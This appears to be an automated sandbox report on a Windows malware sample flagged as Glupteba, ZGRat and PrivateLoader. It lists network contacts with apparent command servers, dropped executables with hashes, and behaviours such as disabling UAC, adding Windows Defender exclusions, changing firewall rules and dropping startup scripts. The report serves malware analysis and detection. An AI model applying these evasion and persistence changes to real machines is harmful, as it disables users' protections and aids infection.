US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.150.38.228:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 server3.theupdatetime.org udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 15.197.250.192:3478 stun.sipgate.net udp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.108:443 server3.theupdatetime.org tcp

Files

memory/2220-0-0x000007FEF5CA3000-0x000007FEF5CA4000-memory.dmp

memory/2220-1-0x0000000000E70000-0x0000000000E7A000-memory.dmp

memory/2220-2-0x00000000005B0000-0x000000000060E000-memory.dmp

memory/2220-3-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2572-8-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-10-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-19-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2580-20-0x0000000002E20000-0x0000000002EA0000-memory.dmp

memory/2572-18-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-17-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-16-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2572-14-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-12-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2580-21-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2580-22-0x0000000000670000-0x0000000000678000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab34D8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar34DB.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Tar35BE.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ff46b0a6ae88e75f6220ab981e3e0e8a
SHA1 61110724609ce2e68fc7fdb63a889e55b3d81ed1
SHA256 36bcc0113b6493f4a9eda8f8eac14437a120d310179f66a7ef2d25195dfd5ba4
SHA512 b1ddfc9a138f04ce549801fb1d4a8e21a8627786ca2117db3eed8f95c8306d9c17992d817f4caaf38eaa48db10688c98db158878e888d77635215fc54175257d

C:\Users\Admin\AppData\Local\Temp\Cab35A9.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe

MD5 8ff1083b2490429a4ea0ecf8f5542c8c
SHA1 70ebf9b87666aab4db253e98e845ea440602a4cc
SHA256 e43535ac108378521826695ae572ea24b4cde1a78b0016d3b5ebe82ff5934535
SHA512 c2f4d386f0b46ed9ed0716e3df086afb3ed360ea3afb74cb3dc0369311088332ae037269575722d5f60a12be9a242f505d32440ed294ad5170ec315c588b3c5c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bfa271adab7bfab7729be3a701604bcb
SHA1 fd5050423dd4eac8aa034ae9dca81a4e27b0a4bc
SHA256 2e1b42b7ce399a5418e642bff79e06a9a2e949e7c11f10a0aca310e2931e829e
SHA512 903e6221a3a81f9a57c4194c5e192f04867cfa626094a2de31c6d5cbd25a31d408446dc3af006bb227a7462b591a69e6d098cd27e3cb093efd426f23eb562724

C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe

MD5 d41fd1ea6e0ca0032be2174317f60fd8
SHA1 60f001b9d201259aa333e9b202e4ab5648d16bf3
SHA256 3c56d175e67df7e1664bbedd95abee57cf93a7aceaf80374ede4ce1fc4a30990
SHA512 a4ce799f1ce9157d053dcb1694dcb127d98e994eb55cecb484ace1c192cf80a1fbfb7b8de94851a49e915cafebc568f70ce07b912e5901387ed90639c692c16e

memory/2572-234-0x00000000099F0000-0x000000000A36B000-memory.dmp

C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe

MD5 b4edadf4b8fc4c176cef6830ab7d3177
SHA1 6f93a98295f5b4a514870db5c50d000f3d644264
SHA256 241ec7b24544cef6c5762622c25c91621f0dd20c9154dcf20c83932d2c3496e5
SHA512 dc727e1cbe252fdfbc866ac4dad3d256038535b32d437d8d17e537c8723b1b8f51da6e0de4a7ac53295cf091fcf93591907f1bd2487618c542bc96e8616232dc

memory/1824-250-0x0000000002FB0000-0x00000000033A8000-memory.dmp

memory/2204-253-0x0000000003150000-0x0000000003548000-memory.dmp

memory/856-252-0x0000000140000000-0x000000014097B000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe

MD5 34e8369309638e9468c65df8d546e9ec
SHA1 f6296bdb66b9f188a9093d0f2e3edaf3dfd5ed9f
SHA256 bc09d4cc90b0e7b582c6ed7010277377aff00042d7469cb2e9f11f775cef4605
SHA512 b792981f6e855fcab23dbb078f5aa2398c6c4175b4b151a656174b756de936bc388d2fa2c8432a9b9120256e5db9ebbfca38a12d60bc085f744988ef1a726c48

memory/980-276-0x0000000003050000-0x0000000003448000-memory.dmp

memory/2484-284-0x0000000003440000-0x0000000003838000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u26o.0.exe

MD5 a33065159222d4c22e581ea419285701
SHA1 6297d390c9d8c3b8c3340d8d38d46c1bbf32d354
SHA256 ddf2f47cbc0db66b326be096b46854a6ab59a2504688077bba0bbb42c4470ae2
SHA512 2860dab79524b7db3f0b7771b8d402905a8096653d1c83e49e3827bb7cd739104848b691be16fbd898b81bfd4fcdd827fc4c8f72da6e91d565f02e59f5725f79

memory/2192-308-0x0000000003170000-0x0000000003568000-memory.dmp

memory/1972-312-0x00000000032E0000-0x00000000036D8000-memory.dmp

memory/1964-313-0x00000000030E0000-0x00000000034D8000-memory.dmp

memory/2680-314-0x0000000003150000-0x0000000003548000-memory.dmp

memory/2140-316-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\Users\Admin\AppData\Local\Temp\u26o.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2484-331-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2832-355-0x0000000000400000-0x0000000002B1E000-memory.dmp

memory/980-315-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1824-334-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2204-356-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2220-369-0x000007FEF5CA3000-0x000007FEF5CA4000-memory.dmp

memory/2192-401-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2276-402-0x0000000003070000-0x0000000003468000-memory.dmp

memory/1972-414-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2680-422-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1964-423-0x0000000000400000-0x0000000002ED5000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 1538d8892608632e9aade661741772fb
SHA1 9b49faf2cb23c18015d1f617ec0b63b9b1f5add2
SHA256 4fa4e24553f12416e69aff86a4cd3bf4d278967660fd137bca9d4543ff939264
SHA512 5521170938be681b2eda9597de875d79936e39bb40744b3ad09b9bff1c00f8b4807d98f58bb4e3d7e70091415a712468001e3225554bcbb8807e360931f1383e

memory/856-444-0x0000000140000000-0x000000014097B000-memory.dmp

memory/2220-445-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2140-446-0x0000000000400000-0x0000000002AF1000-memory.dmp

memory/908-458-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

memory/2572-469-0x00000000099F0000-0x000000000A36B000-memory.dmp

memory/1916-470-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/1916-484-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2276-486-0x0000000000400000-0x0000000002ED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 b0536d63a073ee6a60e9000308a9d61c
SHA1 1353e69e21057cfcf276d11dbc6b314bac327ec8
SHA256 6d1bd49c759595543939da5dfd6d7c790cb6696eda23adb1f8d04b50b1edcd57
SHA512 0f3fcee992c589349d777baca2362a8ebb63bb97b6009ea292121fdd317ca9b438032eba37ae9b57358afa7aefecc32fb3f61fe907e0d7325cc072b0890049e7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a6188e5f5a0d79882e53f2944906cefe
SHA1 52991cc93010de70d126e86ecf55198b94753d8c
SHA256 a3868fc8f6842dc3772956b160e1b0d95cae507122548d2ca572c58ab067ddaa
SHA512 85761e5014acb8f3d7ee9c82f933f00beabc1b513353a3aa4652c823b5f9cb1eab5aceeb8833c510f0460bf80acb9e824d4628be0ce50a3343c4e5dbd670034e

memory/908-510-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1984-550-0x0000000000CD0000-0x0000000004504000-memory.dmp

memory/1984-551-0x000000001EC70000-0x000000001ED7A000-memory.dmp

memory/1984-553-0x0000000000CC0000-0x0000000000CCC000-memory.dmp

memory/1984-552-0x00000000005E0000-0x00000000005F0000-memory.dmp

memory/1984-554-0x0000000000CB0000-0x0000000000CC4000-memory.dmp

memory/1984-555-0x000000001DEF0000-0x000000001DF14000-memory.dmp

memory/1984-565-0x0000000140000000-0x000000014097B000-memory.dmp

memory/1984-567-0x0000000000B00000-0x0000000000B0A000-memory.dmp

memory/1984-566-0x0000000140000000-0x000000014097B000-memory.dmp

memory/1984-569-0x000000001F350000-0x000000001F402000-memory.dmp

memory/1984-568-0x000000001E4B0000-0x000000001E4DA000-memory.dmp

memory/1984-570-0x0000000000B10000-0x0000000000B1A000-memory.dmp

memory/1984-574-0x000000001FB40000-0x000000001FE40000-memory.dmp

memory/1984-576-0x0000000005960000-0x000000000596A000-memory.dmp

memory/1984-578-0x000000001F400000-0x000000001F462000-memory.dmp

memory/1984-579-0x000000001E930000-0x000000001E952000-memory.dmp

memory/1984-577-0x000000001E500000-0x000000001E50A000-memory.dmp

memory/1984-582-0x000000001E950000-0x000000001E95C000-memory.dmp

memory/1984-590-0x0000000140000000-0x000000014097B000-memory.dmp

memory/1984-591-0x0000000140000000-0x000000014097B000-memory.dmp

memory/2276-589-0x0000000000400000-0x0000000002ED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\252e99e709753c2ab04b66e213ab7d72cfdb494a7016e07d23bc17fe7cebab94\767515fedb084df6a70a6b87b7ef68a7.tmp

MD5 fb67c495e466208562de27817cba1991
SHA1 d922da25589139f1c4af90dbcbac5c820e017543
SHA256 e2cef965cbe53b68e11caaee6ad00e4862fa6cc6069cee5b1f5d1014ad02bc53
SHA512 90f2a174a49cb4e98e87b33b76f9557597d4036eec9794af811599b12f3047cc52d29d9f64b4ba47e49dee51ffc163061be581c74104a2f6c74a214d1ffebae8

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

memory/2276-623-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1184-632-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/648-633-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1184-635-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2276-636-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/648-638-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2276-640-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/2276-643-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/648-650-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2276-651-0x0000000000400000-0x0000000002ED5000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 04:05

Reported

2024-05-10 04:07

Platform

win10v2004-20240426-en

Max time kernel

138s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

PrivateLoader

loader privateloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XSL75Dp8X5GvcCSscAgMff6t.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hCJWlBKjXo5Oob92l9foUS1J.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tLX6e4KApytTPZefSa8PPI7v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qqbWpY8aUPcYDuPjF1g7pqRG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ga59klDFaLgG33dY8jiOzth2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2X5ZHEh06YcWQbzIqdRD9re3.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xch3oM5lwdWLIvzlicgaJnAa.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\50SLWprzYHmxenwhmKGlIhTj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 716 set thread context of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
